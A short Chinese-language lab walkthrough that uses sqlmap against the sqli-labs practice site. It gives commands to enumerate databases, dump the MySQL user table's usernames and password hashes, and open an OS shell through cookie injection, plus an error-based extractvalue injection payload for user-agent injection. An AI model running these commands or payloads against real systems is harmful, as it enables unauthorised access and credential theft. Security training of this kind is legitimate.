sqlmap

Sqlmap自动化测试

实验网址http://192.168.19.130/sqli-labs/Less-8/?id=1

Sqlmap:自动化测试sql注入工具
sqlmap -u ‘url’
–dbs 查询库名
-D 指定库
–table 查询表
-T 指定表
–column 查询字段
-C 指定字段
–dumps 读取数据

sqlmap: –batch自动全部选择yes level扫描等级

3.sqlmap -r “/root/桌面/sql-20.txt” –batch –cookie=”uname=admin” –level 3

cookie注入提权:
1.先用burp抓包有cookie注入
2。保存为文件
3.sqlmap -r “/root/桌面/sql-20.txt” –cookie=”id=1” –level 3
4.sqlmap -r “/root/桌面/sql-20.txt” –cookie=”id=1” –level 3 –os-shell

less-18-ua头注入
payload:
‘and extractvalue(1,concat(0x7e,(select database()),0x7e)) and ‘

先写出所有指令,具体步骤紧跟后面附图
1.sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”
2.sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”—dbs
3.sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”-D information_schema –column
4.
1sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”
在这里插入图片描述

//测出布尔型盲注和时间型盲注
2 sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”—dbs //列出所有数据库
在这里插入图片描述

3 sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”-D mysql –-tables//查询mysql中表
在这里插入图片描述

4 sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”-D mysql –T user –-columns//查询user表中的字段
在这里插入图片描述

sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”-D mysql –T user –C user –-dump//查询user字段中的数据
在这里插入图片描述

sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”-D mysql –T user –C password –-dump//查询password字段中的数据
在这里插入图片描述

表中password数据就出来了 当然这是加密的百度解密就行